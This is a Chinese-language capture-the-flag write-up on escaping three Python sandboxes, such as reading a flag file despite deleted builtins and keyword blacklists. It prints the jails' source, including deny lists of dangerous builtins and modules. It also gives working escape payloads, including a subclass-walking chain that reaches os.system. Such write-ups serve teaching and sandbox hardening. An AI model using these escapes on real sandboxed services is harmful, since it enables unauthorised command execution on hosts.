Python沙箱逃逸

案例1

def make_secure():  
    UNSAFE = ['open',  
              'file',  
              'execfile',  
              'compile',  
              'reload',  
              '__import__',  
              'eval',  
              'input']  
    for func in UNSAFE:  
        del __builtins__.__dict__[func]  

from re import findall  

# Remove dangerous builtins  
make_secure()  

print 'Go Ahead, Expoit me >;D'  
while True:  
    try:  
        print ">>>",  
        # Read user input until the first whitespace character  
        inp = findall('\S+', raw_input())[0]  
        a = None  
        # Set a to the result from executing the user input  
        exec 'a=' + inp  
        print '>>>', a  
    except Exception, e:  
        print 'Exception:', e  

下面是脚本运行的效果。

效果相当于python的命令界面，我们的目标是读取当前目录下的flag文件。
如果题目没有任何的过滤，读取的命令如下，导入os包，然后直接执行命令。　

但是直接导入os会报错，如下图
因为 del 命令删除了对应的命令，如下图

看了Ned Batchelder的分享后学到了新知识。我们可以用file对象read文件
下面是元类和元类型详细信息，元组，子对象

由于file在索引40，我们可以硬编码。如下图

用file类型读取flag文件。　

案例2

#!/usr/bin/env python   
from __future__ import print_function  

print("Welcome to my Python sandbox! Enter commands below!")  

banned = [    
    "import",  
    "exec",  
    "eval",  
    "pickle",  
    "os",  
    "subprocess",  
    "kevin sucks",  
    "input",  
    "banned",  
    "cry sum more",  
    "sys"  
]  

targets = __builtins__.__dict__.keys()    
targets.remove('raw_input')    
targets.remove('print')    
for x in targets:    
    del __builtins__.__dict__[x]  

while 1:    
    print(">>>", end=' ')  
    data = raw_input()  

    for no in banned:  
        if no.lower() in data.lower():  
            print("No bueno")  
            break  
    else: # this means nobreak  
        exec data  

相对于第一题，第二题是没有直接的回显。
我们可以用catch_warnings类（索引在59），进行命令执行。

().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls')

案例3

# -*-coding:utf-8-*- 
#!/usr/bin/python3  
import sys, cmd, os  

del __builtins__.__dict__['__import__']  
del __builtins__.__dict__['eval']  

intro = """
pwnhub cuit
pwn everything
Rules:
    -No import
    -No ...
    -No flag
"""  

def execute(command):  
       exec(command, globals())  

class Jail(cmd.Cmd):  
    prompt     = '>>> '  
    filtered    = '\'|.|input|if|else|eval|exit|import|quit|exec|code|const|vars|str|chr|ord|local|global|join|format|replace|translate|try|except|with|content|frame|back'.split('|')  

    def do_EOF(self, line):  
        sys.exit()  

    def emptyline(self):  
        return cmd.Cmd.emptyline(self)  

    def default(self, line):  
        sys.stdout.write('\x00')  

    def postcmd(self, stop, line):  
        if any(f in line for f in self.filtered):  
            print("You are a big hacker !!!")  
            print("Go away")  
        else:  
           try:  
                execute(line)  
           except NameError:  
                print("NameError: name '%s' is not defined" % line)  
           except Exception:  
                print("Error: %s" % line)  
        return cmd.Cmd.postcmd(self, stop, line)  

if __name__ == "__main__":  
    try:  
        Jail().cmdloop(intro)  
    except KeyboardInterrupt:  
        print("\rSee you next time !")  

这题是cuit2017的题目，python3环境。
这里主要过滤了大量的字符，包括1，2题所用的点号。

• print(getattr(os, “system”)

获取system函数地址，

• print(getattr(os, “system”)(“ls”))

执行system(“ls”)
下面是获取flag的姿势

以上都是利用Python作为脚本语言的特性来逃逸